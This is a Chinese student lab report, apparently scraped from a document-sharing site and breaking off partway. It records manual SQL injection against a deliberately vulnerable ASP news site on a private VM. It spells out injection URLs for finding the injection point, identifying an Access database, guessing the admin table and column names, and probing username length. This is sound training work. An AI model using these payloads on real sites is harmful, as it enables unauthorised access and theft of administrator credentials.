資源描述:
《sql注入攻擊實驗報告材料》由會員上傳分享,免費在線閱讀,更多相關(guān)內(nèi)容在工程資料-天天文庫。
1、實用標準文案實驗報告(實驗名稱:SQL注入攻擊)精彩文檔實用標準文案一、實驗目的通過SQL注入攻擊,掌握網(wǎng)站的工作機制,認識到SQL注入攻擊的防范措施,加強對Web攻擊的防范。二、實驗環(huán)境描述實驗開展所基于的網(wǎng)絡(luò)環(huán)境,給出網(wǎng)絡(luò)拓撲、IP地址、web服務(wù)器、客戶機等信息。宿主機(客戶機):操作系統(tǒng)為Windows10,IP為192.168.18.11,在主機上安裝虛擬化軟件VmwarePlayer,在此基礎(chǔ)上創(chuàng)建虛擬機并安裝操作系統(tǒng),進行網(wǎng)絡(luò)配置,采用環(huán)回適配器,橋接模式,實現(xiàn)宿主機與虛擬機之間的網(wǎng)絡(luò)通信,虛擬機(Web服務(wù)器):操作系統(tǒng)為WindowsXP,IP為192.168.18.9,
2、本實驗利用windows的iis服務(wù)搭建了一個有SQL注入漏洞的網(wǎng)站“ASP新聞發(fā)布系統(tǒng)”,以該網(wǎng)站為目標,對其實施SQL注入攻擊。本實驗所需工具如下:IIS是InternetInformationServer的縮寫,是微軟提供的Internet服務(wù)器軟件,包括Web、FTP、Mail等服務(wù)器,也是目前常用的服務(wù)器軟件。版本不限。“啊D”注入工具:對“MSSQL顯錯模式”、“MSSQL不顯錯模式”、“Access”等數(shù)據(jù)庫都有很好的注入檢測能力,內(nèi)集“跨庫查詢”、“注入點掃描”、“管理入口檢測”、“目錄查看”等等于一身的注入工具包?!癆SP新聞發(fā)布系統(tǒng)”O(jiān)k3wv4.6源碼。三、實驗內(nèi)容(
3、一)配置實驗環(huán)境,首先選擇網(wǎng)絡(luò)適配器,安裝環(huán)回適配器,在主機上安裝VmwarePlayer,成功啟動虛擬機。接著配置宿主機和虛擬機的IP,如圖要注意的是,配置主機上的IP時,應該選擇VMnet8,并且注意勾取Bridge精彩文檔實用標準文案然后,驗證宿主機和虛擬機是否聯(lián)通,結(jié)果顯示連接成功。最后在虛擬機上安裝IIS程序,精彩文檔實用標準文案打開瀏覽器,輸入地址“127.0.0.1”,檢查網(wǎng)站搭建情況。成功!(二)尋找注入點在宿主機上,打開網(wǎng)頁http://192.168.18.9/list.asp?id=95,可以正常打開頁面。進行注入測試,鍵入http://192.168.18.9/li
4、st.asp?id=95and1=1,返回頁面不變。精彩文檔實用標準文案鍵入http://192.168.18.9/list.asp?id=95and1=2,返回頁面出錯。因此,可確定該網(wǎng)站存在注入點。(三)判斷數(shù)據(jù)庫類型用系統(tǒng)表的方法進行判斷,分別鍵入http://192.168.18.9/list.asp?id=95and(selectcount(*)fromsysobjects)>0http://192.168.18.9/list.asp?id=95and(selectcount(*)frommsysobjects)>0精彩文檔實用標準文案兩者返回均出錯,可知是access數(shù)據(jù)庫。
5、精彩文檔實用標準文案(四)猜測表名一般網(wǎng)站后臺的管理員都默認在表admin中,我們先試一下,鍵入:http://192.168.18.9/list.asp?id=95and(selectcount(*)fromadmin)<>0返回頁面正常,可知該網(wǎng)站后臺數(shù)據(jù)庫中存在著表名為admin的表。
(五)猜測字段名不同公司網(wǎng)站有不同的字段名,但一般都有三個字段,分別記錄ID號、用戶名和密碼,常用的字段名為:id,username,password。分別鍵入http://192.168.18.9/list.asp?id=95and(selectcount(id)fromadmin)<>0http:
6、//192.168.18.9/list.asp?id=95and(selectcount(username)fromadmin)<>0http://192.168.18.9/list.asp?id=95and(selectcount(password)fromadmin)<>0三者返回均正常??芍?,表admin中存在的三個字段:id,username,password。注:“username”的截圖損壞,但是返回正常,望教員通融。(六)猜測管理員用戶名和密碼1.確定表admin中有幾條記錄,鍵入http://192.168.18.9/list.asp?id=95and(selectcoun
7、t(*)fromadmin)=1返回頁面正常。精彩文檔實用標準文案可知,表admin只有一條記錄。2.猜測用戶名長度,鍵入http://192.168.18.9/list.asp?id=95and(selectlen(username)fromadmin)=1返回出錯,繼續(xù)鍵入http://192.168.18.9/list.asp?id=95and(selectlen(username)fromadmin)=2返回出錯